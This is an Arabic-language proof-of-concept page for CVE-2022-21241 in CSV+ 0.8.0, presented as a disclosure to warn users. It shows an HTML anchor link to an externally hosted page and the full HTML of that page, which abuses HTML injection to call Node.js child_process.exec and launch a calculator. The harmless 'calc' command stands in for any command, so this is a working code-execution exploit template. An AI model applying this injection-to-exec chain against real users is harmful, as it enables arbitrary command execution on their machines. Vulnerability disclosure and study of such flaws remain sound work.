
👻 [PoC] CSV+ 0.8.0 - تنفيذ كود تعسفي (CVE-2022-21241)
👻 ثغرة تنفيذ كود اعتباطي بنقرتين.

CVE-2022-21241
⚠
تم إنشاء هذا الـ PoC لتنبيه المستخدمين والتحقيق في الثغرات الموجودة في CSV+ الخاص بهم، ويُحظر استخدامه في الهجمات.
الإصدارات التالية معرضة للخطر.
يمكن للمهاجمين تنفيذ كود اعتباطي باستخدام وظائف Node.js. سيضعون كود الجافاسكربت الخبيث على موقع ما ويربطونه من وسوم a مستغلين ثغرة حقن HTML في CSV+.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html هو رابط مؤقت.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>